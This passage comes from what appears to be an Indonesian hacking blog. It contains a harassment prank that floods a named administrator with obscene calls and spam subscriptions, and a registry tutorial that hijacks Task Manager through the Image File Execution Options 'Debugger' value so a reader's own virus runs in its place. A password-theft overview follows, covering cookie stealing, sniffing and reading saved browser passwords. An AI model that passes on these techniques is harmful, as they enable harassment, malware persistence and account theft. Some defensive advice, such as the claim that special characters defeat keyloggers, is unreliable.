gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!

---------------------------------evolution---------------------------------
Read More to.. Pembalasan Sang Admin

Menyisipkan Virus/Worm pada Windows Task Manager

|
Windows Task Manager merupakan tools bawaan windows untuk memantau aplikasi-aplikasi yang sedang berjalan, baik yang tampil maupun yang berjalan secara background. Melalui aplikasi ini user bisa melakukan penghentian suatu proses background secara paksa, menghentikan proses yang tidak dikehendaki atau menghentikan suatu aplikasi yang mengalami kondisi Not Responding.



Begitu pula ketika tersadar bahwa komputer kesayangannya terserang Virus/Worm, kebanyakan user akan secara reflek menggunakan tiga jari sakti-nya untuk menekan [Ctrl]+[Alt]+[Del] guna memanggil Windows Task manager dengan tujuan menghentikan proses si Virus/Worm.



Cara lain untuk memanggil Task Manager ialah dengan melakukan klik kanan pada area kosong Taskbar lalu memilih menu Task manager. Bisa juga dengan mengetikkan TASKMGR pada kotak dialog RUN (Start -> Run). Atau dengan mengeksekusi langsung file taskmgr.exe yang berada di system directory (C:\WINDOWS\System32\).



Karena kemampuannya untuk memantau proses yang sedang berjalan dan menghentikannya secara paksa inilah yang membuat kebanyakan penulis Virus akan berusaha untuk mencegah user mengakses Windows Task Manager agar Virus/Worm yang diciptakannya sulit dihentikan.



Jika Anda sedang melakukan eksperimen dengan Virus/Worm, ada sedikit trik untuk 'menyisipkan' Virus/Worm Anda pada Windows Task Manager supaya nantinya ketika user mengakses Windows Task Manager justru Worm/Virus Andalah yang dijalankan, bukan Windows Task manager itu sendiri.



Okay, kita mulai eksperimen kita ;)



1. Bukalah Registry Editor, (Start) -> (Run) ketik REGEDIT

2. Pergilah ke lokasi berikut:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe



3. Buatlah sebuah string value dengan nama Debugger (Klik kanan pada area kosong

panel sebelah kanan, pilih New lalu klik String Value. Beri nama Debugger).

Perhatikan gambar berikut:



4. Klik ganda pada String Value yang baru Anda buat tadi. Isikan lokasi Virus

Anda pada form isian Value Data. Atau sebagai percobaan, masukkan saja lokasi

Windows Command Processor -> C:\WINDOWS\System32\cmd.exe

Kemudian Klik [OK] sesudahnya.




5. Kini cobalah untuk mengakses Windows Task Manager dengan menekan kombinasi

[Ctrl]+[Alt]+[Del] atau klik kanan pada area kosong Taskbar lalu pilih menu

Task manager ... atau.. terserah Anda laah.. ^_^ dan... TA..DAAAAAA....!!




Task manager Anda tidak akan tampil. Yang berjalan justru Windows Command Processor sesuai dengan yang Anda isikan pada Value Data tadi.



Nah, kini Anda bisa mengimplementasikannya dalam Virus/Worm ciptaan anda. Dengan demikian user tidak akan bisa mengakses Windows Task Manager. Ketika user berusaha melakukan pengaksesan Task Manager, justru Virus/Worm Andalah yang berjalan ;)



Trik ini sebenarnya bisa juga diterapkan untuk hal-hal baik. Misalnya saja Anda merasa kurang puas dengan Windows Task Manager dan Anda ingin mengganti aplikasi tersebut dengan aplikasi sejenis yang memiliki kemampuan lebih baik, maka Anda bisa menerapkan trik ini untuk tujuan tersebut.



Sekian, semoga bermanfaat..!!









---------------------------------evolution---------------------------------
Read More to.. Menyisipkan Virus/Worm pada Windows Task Manager

Perkenalan Wireless Hacking

|
----[ Table of Contents



[1]. Preface

[2]. Pengenalan Wireless Lan (WLAN)

[3]. Ancaman-Ancaman yang Mungkin Terjadi

[4]. Amankan Jaringan Wireles Anda!!

[5]. Istilah-istilah



-------------------------------------------





[1]. Preface

----------------------------------

Hmm.. we'll learn all about Wireless hacking. All?? nggak juga sich, hehehe.. maklum, ilmu sang penulis masih sangat terbatas. So, bagi yang udah expert dalam bidang ini, koreksi yach.. ;)





[2]. Pengenalan Wireless LAN (WLAN)
-----------------------------------

Wireless LAN sering juga disebut sebagai Jaringan Nirkabel atau jaringan Wireless. Wireless Local Area Network (WLAN) merupakan jaringan komputer yang menggunakan gelombang radio sebagai media transmisi data. Dalam hal ini berarti informasi/data ditransfer dari satu komputer ke komputer lain dengan menggunakan gelombang radio.


Semuanya berawal dari bermunculannya peralatan yang berbasis gelombang radio (walkie talkie, telepon cordless, ponsel, dsb..). Dari sinilah muncul pemikiran untuk menjadikan komputer sebagai sesuatu yang mudah dibawa sehingga bisa dipergunakan dimana saja saat dibutuhkan. Hal-hal seperti inilah yang akhirnya mendorong pengembangan teknilogi wireless untuk jaringan komputer.





:: SEJARAH WLAN

---------------


|-[ Tahun 1997:

Sebuah lembaga independen bernama IEEE membuat spesifikasi/standar WLAN pertama yang diberi kode 802.11. Peralatan yang sesuai standar 802.11 dapat bekerja pada frekuensi 2,4GHz, dan kecepatan transfer data (throughput) teoritis maksimal 2Mbps. Namun sayangnya, peralatan yang mengikuti spesifikasi 802.11 kurang bisa diterima di pasar. Througput sebesar ini dianggap kurang memadai untuk aplikasi multimedia dan aplikasi kelas berat lainnya.


|-[ Juli 1999:

IEEE kembali mengeluarkan spesifikasi baru yang bernama 802.11b. Kecepatan transfer data teoritis maksimal yang dapat dicapai adalah 11 Mbps. Kecepatan tranfer data sebesar ini sebanding dengan Ethernet tradisional (IEEE 802.3 10Mbps atau 10Base-T). Peralatan yang menggunakan standar 802.11b juga bekerja pada frekuensi 2,4Ghz. Namun masih ada kekurangan pada peralatan wireless yang bekerja pada frekuensi ini yaitu kemungkinan terjadinya interferensi dengan peralatan-peralatan lain yang menggunakan gelombang radio pada frekuensi yang sama.


Disaat yang hampir bersamaan, IEEE kemudian membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Akan tetapi Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus penghalang seperti dinding dan lain sebagainya. Jarak jangkau gelombang radio pun relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini sudah cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut.


|-[ Tahun 2002:

IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi baru ini diberi kode 802.11g, bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b sehingga bisa saling dipertukarkan.





[3]. Ancaman-Ancaman yang Mungkin Terjadi

-----------------------------------------

Setiap ada teknologi baru yang ditemukan, selalu ada ancaman yang timbul. Hal ini memang tidak dapat dielakkan. Begitu juga dalam WLAN. Berikut ini adalah ancaman-ancaman yang mungking timbul:

:: Pencurian Identitas

-----------------------
Penggunaan MAC ADDRESS (Media Access Control) untuk menentukan komputer mana yang berhak mendapatkan koneksi dari jaringan nirkabel sudah sejak lama dilakukan. Akan tetapi, tidak dapat dipungkiri, hal ini sebenarnya sebenarnya tidak memberikan perlindungan yang berarti dalam sebuah jaringan komputer manapun.



Penyusup bisa saja melakukan pencurian identitas dengan teknik spoofing Mac Address untuk menggandakan SSID (Service Set Identifier) dan MAC Address yang merupakan PIN akses jaringan. Penyusup mampu menggunakan SSID dan MAC dari komputer lain untuk melakukan tindakan-tinadkan yang merugikan (misalnya saja pencurian bandwidth).


Walaupun toh suatu jaringan telah dilengkapi dengan enkripsi data atau VPN (Virtual Private Network), MAC Address masih bisa dilacak dan di-spoof. Informasi mengenai MAC Address bisa diperoleh dari program seperti Kismet. Untuk melakukan pencurian identitas, penyusup akan menggunakan program spoofing atau mengubahnya melalui Registry (Windows)

:: Man-in-the-Middle

--------------------
“Man-in-the-middle”. Sebenarnya inilah sebuatn bagi sang penyusup. Serangan Man-in-the-Middle dilakukan dengan mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Jenis serangan ini hampir sama dengan jenis serangan pada jaringan kabel. Program yang digunakan juga sama, kecuali perangkat wirelessnya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel.


Serangan seperti ini mudah dilakukan dengan bantuan software yang tepat, misalnya saja Wireless LANJack atau AirJack. Akan tetapi serangan jenis ini juga relatif mudah dicegah dengan IDS yang handal yang mampu memonitoring 24 jam sehari.


:: Denial of Service (DoS)

--------------------------
Hohoho.. inilah serangan yang paling ditakutkan oleh para Admin. Denial Of service memang relatif sulit untuk dicegah. Serangan ini dapat menimbulkan downtime pada jaringan. Tool gratisan seperti Wireless LANJack dan hunter_killer mampu melakukan serangan ini. Serangan ini bisa saja diarahkan pada user biasa agar user tersebut tidak bisa terkoneksi dengan suatu access point. Tujuannya tak lain adalah supaya tidak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data (penolakan layanan).


Seorang penyusup bisa saja mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server. Aksi ini dibarengi dengan melakukan flooding data. Dengan demikian maka tidak ada satu pun user yang bisa melakukan koneksi dengan layanan jaringan.

:: Network Injection

---------------------
Aapbila sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup berpotensi untuk melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dalam kondisi ini, maka semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sebagaimana mestinya. Routing attack juga termasuk dalam serangan jenis ini. Sang penyusup bisa melakukan hal ini dengan mudah menggunakan program seperti IRPAS, yang dipergunakan untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada.




[4]. Amankan Jaringan Wireles Anda!!

------------------------------------


Solusi berikut memang tidak akan membuat jaringan anda 100% secure. Ingat kata-kata klasik... di dunia yang tidak sempurna ini, tidak ada sesuatu yang 100% secure! Hal-hal berikut ini hanya akan meminimalisir serangan yang berpotensi untuk merusak jaringan anda.

1. Ubahlah Password Default Access Point. Banyak serangan yang terjadi adalah karena segalanya dibiarkan pada setting default, termasuk password. Kebanyakan penyerang biasanya akan berfikiran hal yang satu ini, yaitu berharap bahwa sang target belum mengubah password defaul Access Point.

2. Ubahlah IP default. Dahulu hal ini kurang memungkinkan untuk dilakukan. Namun dewaas ini sudah banyak merek-merek Access Point yang memiliki fasilitas ini.

3. Aktifkan metode enkripsi. Pergunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK).Berikan juga password yang "aman", dalam artian sulit ditebak dan tidak memiliki arti. Anda juga bisa memanfaatkan enkripsi WPA dengan Temporal Key Integrity Protokol.

4. Matikan fungsi Broadcast SSID. Dengan demikian, maka SSID Anda tidak akan terdeksi pada proses War Driving. Akan tetapi.. kabar buruknya (atau kabar baik??), saat ini sudah ada beberapa aplikasi scanning yang bisa menditeksi SSID yang terhidden. Yeah, walaupun demikian anda tetap bisa melindungi SSID dengan cara merubah nama SSID default dengan nama SSID yang sulit ditebak.

5. Gunakan MAC Address Filtering. Hal ini berguna untuk mengurangi aktivitas penysupan.

6. Non Aktifkan DHCP. Gunakan IP Static dengan nilai yang jarang digunakan.

7. Gunakan Security tambahan seperti CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point.

8. Pergunakan software seperti Mc Afee Wireless Home Security untuk melakukan Access Point Monitoring via Client.




[5]. Istilah-istilah

--------------------


1. Wi-Fi atau WiFi (Wireless Fidelity)
Wi-Fi atau adalah nama lain yang diberikan untuk produk yang mengikuti spesifikasi 802.11. Sebagian besar pengguna komputer lebih mengenal istilah Wi-Fi card/adapter dibandingkan dengan 802.11 card/adapter. Wi-Fi merupakan merek dagang, dan lebih popular dibandingkan kata “IEEE 802.11”.

2. Channel
Pita frekuensi andaikan sebuah jalan. Channel inilah yang berfungsi seakan-akan sebagi jalur-jalur pemisah pada jalan tersebut. Peralatan 802.11a bekerja pada frekuensi 5,15 - 5,875 GHz, sedangkan peralatan 802.11b dan 802.11g bekerja pada frekuensi 2,4 - 2,497 GHz. Jadi , 802.11a menggunakan pita frekuensi lebih besar dibandingkan 802.11b atau 802.11g. Semakin lebar pita frekuensi, semakin banyak channel yang tersedia.


3. MIMO
MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Beberapa keunggulan lain dari MIMO adalah:



- Daya tembus MIMO terhadap penghalang lebih baik.

- Jangkauannya lebih luas. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan.

- Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g.

- MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbps.


4. WEP
WEP (Wired Equivalent Privacy) merupakan salah satu fitur keamanan/sekuriti yang bersifat build-in pada peralatan Wi-Fi. Gelombang radio yang dipancarkan adapter Wi-Fi dapat diterima oleh semua peralatan Wi-Fi yang berada di sekitarnya. Hal inilah yang menjadi ancaman serius karena dalam kondisi ini informasi informasi bisa dengan mudah ditangkap oleh pihak-pihak yang tidak semestinya. Oleh skarena itulah Wi-Fi dibuat dengan beberapa jenis enkripsi : 40 bit, 64 bit, 128 bit dan 256 bit. Namun semakin tinggi tingkat keamanannya, maka penurunan throughput data juga semakin besar.

5. SSID
SSID (Service Set IDentifier) merupakan identifikasi atau nama untuk jaringan wireless. Setiap peralatan Wi-Fi harus menggunakan SSID tertentu. Suatu peralatan Wi-Fi dianggap ebrada dalam satu jaringan apabila mengunakan SSID yang sama. Sama seperti password, SSID bersifat case-sensitive yaitu huruf kapital dan huruf kecil dibedakan.

6. SES
Selama ini kesulitan yang sering dialami oleh kebanyakan orang ialah dalam hal setup security jaringan. Padahal hal ini merupakan hal yang sangat penting dalam dunai jaringan. Karena itulah diciptakan SES (SecureEasySetup). Kini, hanya dengan menekan satu tombol, SES secara otomatis memberikan SSID dan kode sekuriti ke router dan adapter serta menerapkan security WPA (Wireless Protected Access). Untuk menggunakan SES, pengguna hanya perlu menekan tombol SES pada router, kemudian pada client. Cukup mudah, adn kedua perangkat tersebut kini sudah memiliki jalur lalu-lintas yang aman.


---------------------------------evolution---------------------------------
Read More to.. Perkenalan Wireless Hacking

cara sang hacker mengetahui password

|
: Table oF Contents :
---------------------
0 [0XFF00000] Preface
0 [0XFFF0000] Bagaimana Mendapatkannya?
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
0 [0XFFFF000] Penutup
0 [0XFFFFF00] Referensi
0 [0XFFFFFF0] Shoutz
0 [0XFFFFFFF] Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]



0 [0XFF00000] Preface

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. "Bagaimana cara mendapatkan password
email orang lain?" atau pertanyaan yang paling sering saya terima ialah..
"Bagaimana cara anda mendapatkan password saya?" :P

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.


0 [0XFFF0000] Bagaimana Mendapatkannya?

Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling


[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
"penipuan" :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.

Social Engineering merupakan seni "memaksa" orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja "pemaksaan" yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.

# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]


[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.

Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.


[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.


[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).

Baca artikel terkait pada arsip lama :)


[5]. Password Cracking

"Hacking while sleeping." itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute - force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri
aplikasinya di halaman Member - spyrozone.net.


[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : "HACKED", "DEFACED", "OWNED".. dll.. Jika ragu-ragu....... reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.


[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.


[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools ---> Internet options
---> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file "sampah"?? Hmm... sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools ---> Options --->
Security --> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi... kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi "YES".

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It's fun
enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!


[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, "si pintar" ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak... yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi... maka bersiaplah.. "taman
bermain" anda akan diambil alih olehnya..


0 [0XFFFF000] Penutup

Wew... ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.

Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)


0 [0XFFFFF00] Referensi

- securityfocus[dot]com
- phrack[dot]org
- spyrozone[dot]tk
- google[dot]com


0 [0XFFFFFF0] Shoutz:

- Vindika Anastasya & Vermouth Anastasya.. The deepest Love I'v ever had.. :)
- All Crack Sky Staff! Hey there.. :)
- ECHOERS, SECTOR-S (wake up guys!!)
